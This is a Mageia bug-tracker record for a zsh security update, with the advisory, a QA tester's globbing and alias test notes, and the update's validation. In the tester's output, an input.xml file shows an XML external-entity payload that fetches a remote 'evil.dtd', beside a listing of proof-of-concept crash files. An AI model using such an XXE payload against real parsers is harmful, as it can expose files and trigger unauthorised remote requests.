| Summary: | zsh new security issues CVE-2017-1820[56] and CVE-2018-754[89] | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | major | ||
| Priority: | Normal | CC: | smelror, sysadmin-bugs, tarazed25 |
| Version: | 6 | Keywords: | advisory, has_procedure, validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | MGA6-64-OK | ||
| Source RPM: | zsh-5.4.2-1.mga7.src.rpm | CVE: | |
| Status comment: | |||
|
Description
David Walser
2018-03-11 15:12:39 CET
David Walser
2018-03-11 15:12:46 CET
Whiteboard:
(none) =>
MGA6TOO The first four CVEs only affect Mageia 5, which we won't be fixing. CVE-2017-18206 and CVE-2018-7548 don't affect Mageia 5. CVE-2017-1820[56] are already fixed in the version in Cauldron. CVE-2018-754[89] affect both Mageia 6 and Cauldron. Summary:
zsh new security issues CVE-2014-1007[0-2], CVE-2016-10714, CVE-2017-1820[56], CVE-2018-754[89] =>
zsh new security issues CVE-2017-1820[56] and CVE-2018-754[89]
Stig-Ørjan Smelror
2018-03-12 00:12:27 CET
Assignee:
bugsquad =>
smelror Advisory ======== Zsh has been updated to fix 2 security issues. It was discovered that Zsh incorrectly handled certain inputs. An attacker could possible use to execute arbitrary code. This issue only affected Ubuntu 17.10. (CVE-2018-7548) It was discovered that Zsh incorrectly handled certain inputs. An attacker could possibly use this to cause a denial of service. (CVE-2018-7549) References ========== https://usn.ubuntu.com/3593-1/ https://nvd.nist.gov/vuln/detail/CVE-2018-7548 https://nvd.nist.gov/vuln/detail/CVE-2018-7549 Files ===== Uploaded to core/updates_testing: zsh-5.3.1-1.1.mga6 zsh-doc-5.3.1-1.1.mga6 from zsh-5.3.1-1.1.mga6.src.rpm
Stig-Ørjan Smelror
2018-03-12 00:24:37 CET
Whiteboard:
MGA6TOO =>
(none) Zsh for Cauldron has also been updated. You forgot CVE-2017-1820[56] for Mageia 6. CC:
(none) =>
qa-bugs Advisory
========
Zsh has been updated to fix 4 security issues.
In builtin.c in zsh before 5.4, when sh compatibility mode is used, there is a NULL pointer dereference during processing of the cd command with no argument if HOME is not set. (CVE-2017-18205)
In utils.c in zsh before 5.4, symlink expansion had a buffer overflow. (CVE-2017-18206)
In subst.c in zsh through 5.4.2, there is a NULL pointer dereference when using ${(PA)...} on an empty array result.(CVE-2018-7548)
In params.c in zsh through 5.4.2, there is a crash during a copy of an empty hash table, as demonstrated by typeset -p. (CVE-2018-7549)
References
==========
https://usn.ubuntu.com/3593-1/
https://nvd.nist.gov/vuln/detail/CVE-2017-18205
https://nvd.nist.gov/vuln/detail/CVE-2017-18206
https://nvd.nist.gov/vuln/detail/CVE-2018-7548
https://nvd.nist.gov/vuln/detail/CVE-2018-7549
Files
=====
Uploaded to core/updates_testing:
zsh-5.3.1-1.2.mga6
zsh-doc-5.3.1-1.2.mga6
from zsh-5.3.1-1.2.mga6.src.rpmAssignee:
smelror =>
qa-bugs
David Walser
2018-03-12 00:42:07 CET
CC:
qa-bugs =>
(none) Testing this for Mageia 6 in x86_64 virtualbox. Installed zsh. Switched user to the Z shell andlogged out and in. zsh was active and presented a dialogue for setting up .zshrc. Typing 0 results in a .zshrc containing only a comment. Some useful notes at http://fendrich.se/blog/2012/09/28/no/ Played with the directory commands then updated from updates testing under su. As user ran some of the commands again and used vi to write this report. Familiar commands continued to work as in bash. Globbing examples List all files greater than 20KB in size: $ ls -l pocs/**(Lk+20) -rw-r--r-- 1 lcl lcl 38109 Sep 28 17:35 pocs/gx_ttfReader__Read -rw-r--r-- 1 lcl lcl 38109 Sep 28 17:34 pocs/Ins_IP -rw-r--r-- 1 lcl lcl 38109 Sep 28 17:37 pocs/Ins_JMPR -rw-r--r-- 1 lcl lcl 38109 Sep 28 17:30 pocs/Ins_MDRP -rw-r--r-- 1 lcl lcl 38109 Sep 28 16:27 pocs/Ins_MIRP -rw-r--r-- 1 lcl lcl 788480 Jul 26 2017 pocs/memory-leak-in-ReadPCDImage-9.pcd -rw------- 1 lcl lcl 50888704 Sep 28 23:25 pocs/vgcore.1260 -rw------- 1 lcl lcl 50888704 Sep 29 09:52 pocs/vgcore.4428 Edit the file input.xml wherever it is in the directory structure starting at the current directory. $ pwd /home/lcl/pad $ vi **/input.xml <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;]> $ ls qa/xml/public EGPH.TXT input.xml output.xml It would take a few days at least to become familiar with writing functions, which I think would go into the .zshrc file just like in .tcshrc and then be used as commands, so let's skip that part. Global aliases are a new thing and presumably these would normally reside in .zshrc. For this test defining one on the command-line shall suffice. $ alias -g L="|less" $ cat L notebook/notes.belexeuli q That turns cat into a pager. The shell is working for 64-bits. CC:
(none) =>
tarazed25 Re comment 6: yes, 'cat L' is obviously redundant but it shows the principle of global aliases. Good work Len. Advisory uploaded. Validating. Keywords:
(none) =>
advisory, has_procedure, validated_update An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2018-0168.html Resolution:
(none) =>
FIXED |